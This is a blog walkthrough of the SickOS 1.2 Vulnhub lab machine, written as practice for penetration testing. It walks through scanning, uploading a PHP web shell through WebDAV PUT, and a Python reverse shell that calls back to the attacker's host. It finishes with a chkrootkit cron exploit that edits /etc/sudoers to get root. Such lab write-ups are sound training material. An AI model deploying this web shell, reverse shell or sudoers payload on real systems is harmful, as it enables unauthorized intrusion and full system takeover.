SICK OS v1.2 Walkthrough




Vulnhub machine SICK OS 1.2 Walkthrough (OSCP friendly and no Metasploit)


We start with nmap and found only 2 ports open SSH and HTTP.

# Nmap 7.70 scan initiated Sat Aug  3 20:02:23 2019 as: nmap -sC -sV -p- -oN nmap 192.168.78.144

Nmap scan report for 192.168.78.144

Host is up (0.0015s latency).

Not shown: 65533 filtered ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)

|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)

|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)

80/tcp open  http    lighttpd 1.4.28

|_http-server-header: lighttpd/1.4.28

|_http-title: Site doesn't have a title (text/html).

MAC Address: 00:0C:29:CD:1F:EC (VMware)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Sat Aug  3 20:04:24 2019 -- 1 IP address (1 host up) scanned in 120.72 seconds

Do Enumeration of both services;
SSH is OpenSSH 5.9p1 , look for an exploit for it, there is no exploit found for this specific version.
Check HTTP service, with nikto , dirb and every tool you can think of until you find some lead.

-----------------

DIRB v2.22    

By The Dark Raver

-----------------



OUTPUT_FILE: dirb

START_TIME: Tue Aug  6 14:04:42 2019

URL_BASE: http://192.168.78.144/

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt



-----------------



GENERATED WORDS: 4612



---- Scanning URL: http://192.168.78.144/ ----

+ http://192.168.78.144/index.php (CODE:200|SIZE:163)

==> DIRECTORY: http://192.168.78.144/test/



---- Entering directory: http://192.168.78.144/test/ ----

(!) WARNING: Directory IS LISTABLE. No need to scan it.

    (Use mode '-w' if you want to scan it anyway)



-----------------

END_TIME: Tue Aug  6 14:04:51 2019

DOWNLOADED: 4612 - FOUND: 1

Dirb give us /test
From here we are kind of lost, lets find out more about WebServer.
Checking http methods with nse script.

nmap --script http-methods 192.168.78.144

Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-07 06:29 EDT

Nmap scan report for 192.168.78.144

Host is up (0.0013s latency).

Not shown: 998 filtered ports

PORT   STATE SERVICE

22/tcp open  ssh

80/tcp open  http

| http-methods:

|_  Supported Methods: GET HEAD POST OPTIONS

MAC Address: 00:0C:29:CD:1F:EC (VMware)



Nmap done: 1 IP address (1 host up) scanned in 18.51 seconds

Further checking the OPTIONS Method.

root@kali:~/vulnhub/sickos2# curl -X OPTIONS -v 192.168.78.144/test

*   Trying 192.168.78.144...

* TCP_NODELAY set

* Connected to 192.168.78.144 (192.168.78.144) port 80 (#0)

> OPTIONS /test HTTP/1.1

> Host: 192.168.78.144

> User-Agent: curl/7.60.0

> Accept: */*

>

< HTTP/1.1 301 Moved Permanently

< DAV: 1,2

< MS-Author-Via: DAV

< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK

< Location: http://192.168.78.144/test/

< Content-Length: 0

< Date: Wed, 07 Aug 2019 10:30:53 GMT

< Server: lighttpd/1.4.28

<

* Connection #0 to host 192.168.78.144 left intact

We have PUT method possible , lets try it.

Curl -v -X PUT -d ‘<?php echo system($_GET[“cmd”]); ?>’ http://192.168.78.144/test/star.php

We will use post command to upload or create a file if the PUT method didn’t work.
Upon checking the /test URL we found our new page star.php. Lets get a shell.
Using multiple methods of reverse shell one by one. I found the python reverse shell working on port 8080. It failed on some ports seems only a few are allowed, I checked the ports by making a webserver on my machine and trying to access it by wget from the target, just to know if that port is open for communication.

http://192.168.78.144/test/star.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.78.135%22,8080));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

We Got a shell of user ‘www-data’ with this command.
Looking for privilege escalation, tried multiple kernel exploits for 3.11 kernel but none worked.
Upon using a privilege escalation checker scripts, i found a cron job running chkrootkit as root. There is an local priv esc exploit for chkrootkit for version 0.49. We can check the version by typing command :
Chkrootkit -V
The version of chkrootkit is 0.49 in target. One more condition of this exploit is that the /tmp should be noexec and the priv esc script told us this already. So , the system is meeting all conditions, lets use the exploit.
exploits/linux/local/33899.txt
As per the exploit we need to create a file named ‘update’ in /tmp. Put our malicious code in it , make it executable and wait for the cron job to execute it.
The code I write in update file is :

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

What this do is, since this will be run as root, so change the permission of sudoers file , then make the www-data user able to run all sudo commands, and then change the sudoers file back to the permissions it had.

www-data@ubuntu:/etc$ sudo -l

Matching Defaults entries for www-data on this host:

    env_reset,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin



User www-data may run the following commands on this host:

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

    (root) NOPASSWD: ALL

www-data@ubuntu:/etc$ sudo su

root@ubuntu:/etc# id

uid=0(root) gid=0(root) groups=0(root)

root@ubuntu:/etc# whoami;hostname

root

ubuntu

After a while I checked the sudo permissions and our code was executed and we had all the sudo permissions.

root@ubuntu:/etc# cd /root

root@ubuntu:~# ls

304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz  chkrootkit-0.49

7d03aaa2bf93d80040f3f22ec6ad9d5a.txt                     newRule

root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt

WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.



Thanks for giving this try.



@vulnhub: Thanks for hosting this UP!.

The newRule file has the details of ports that are blocked by iptables.

root@ubuntu:~# cat newRule

# Generated by iptables-save v1.4.12 on Mon Apr 25 22:48:24 2016

*filter

:INPUT DROP [0:0]

:FORWARD ACCEPT [0:0]

:OUTPUT DROP [0:0]

-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT

-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT

-A INPUT -p tcp -m tcp --sport 8080 -j ACCEPT

-A INPUT -p tcp -m tcp --sport 443 -j ACCEPT

-A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT

-A OUTPUT -p tcp -m tcp --sport 80 -j ACCEPT

-A OUTPUT -p tcp -m tcp --dport 8080 -j ACCEPT

-A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT

COMMIT

# Completed on Mon Apr 25 22:48:24 2016


 


 574r570rm

No comments:

Scheduled Skype Message in Python

To send a message on Skype at a scheduled time, you can use the schedule library in Python along with the skype4py library to interact wit...